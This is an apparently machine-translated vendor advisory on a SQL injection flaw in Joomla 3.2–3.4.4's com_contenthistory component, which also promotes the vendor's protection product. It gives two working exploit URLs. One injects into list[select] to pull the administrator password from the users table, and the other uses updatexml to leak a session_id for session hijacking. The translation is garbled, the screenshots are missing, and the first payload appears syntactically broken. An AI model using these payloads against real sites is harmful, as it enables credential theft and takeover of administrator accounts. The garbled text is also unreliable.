Well-known CMS software Joomla Storage SQL Injection Vulnerability

recently, Trustwave spiderlabs researcher Asaf Orpani found the well-known CMS Joomla 3.2-3.4.4 version of SQL Injection vulnerability, the Security Dog Laboratory detection of the vulnerability of a huge harm, wide range, the use of low difficulty . The vulnerability has been fixed in the 3.4.5 release, please update the relevant website in a timely manner. In addition, the security dog is tested to protect against the vulnerability.

Detailed description of the vulnerability and how to use it

According to ASAF Orpani analysis, the SQL injection vulnerability exists in

/administrator/components/com_contenthistory/models/history.php Place.

The following lines of code that describe the Joomla principle can help us to exploit this vulnerability (PAYLOAD)

After executing the code, return to the following page, you can get the user session directly:

The following payload can be tested to obtain the administrator password directly:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id =1&type_id=1&list[select]= (select 1 from (SELECT COUNT (*), concat (SELECT (select concat (password)) from%23__ Users limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X)

Shown

Above payload can not explode session_id, after our laboratory modified the following this paragraph could be perfect explosion session_id.

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1& list[select]= (select 1=updatexml (1,concat (0x5e24, (select session_id from jml_session limit 0,1), 0x5e24), 1))

As shown in the following:

And in a detailed understanding of the use of the vulnerability of the principle, the security of the dog-related technical personnel carried out the detection, and finally found that the Security Dog Products website Security Dog can defend the vulnerability, please rest assured that users use.

Well-known CMS software Joomla Storage SQL Injection Vulnerability